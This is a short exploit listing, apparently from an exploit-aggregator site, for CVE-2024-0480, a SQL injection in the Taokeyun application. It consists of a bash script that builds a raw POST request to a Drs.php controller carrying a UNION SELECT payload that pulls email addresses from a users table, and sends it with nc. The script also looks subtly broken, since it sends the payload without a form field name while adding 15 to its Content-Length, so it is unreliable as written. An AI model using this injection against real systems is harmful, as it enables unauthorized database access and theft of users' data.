Exploit for Taokeyun SQL Injection CVE-2024-0480

Name: Exploit for Taokeyun SQL Injection CVE-2024-0480
Rating: 5 (123 reviews)

2024-01-15 | CVSS 7.5

## https://sploitus.com/exploit?id=PACKETSTORM:176548
#!/bin/bash  
  
# Variables  
url="http://example.com/path/to/taokeyun/application/index/controller/m/Drs.php"  
cid="1' UNION SELECT 1,2,3,4,5,6,7,8,9,email FROM users-- -"  
  
# Construct the request  
request="POST $url HTTP/1.1\r\n"  
request+="Content-Type: application/x-www-form-urlencoded\r\n"  
request+="Content-Length: $((${#cid}+15))\r\n\r\n"  
request+="$cid"  
  
# Send the request  
(echo -e "$request") | nc example.com 80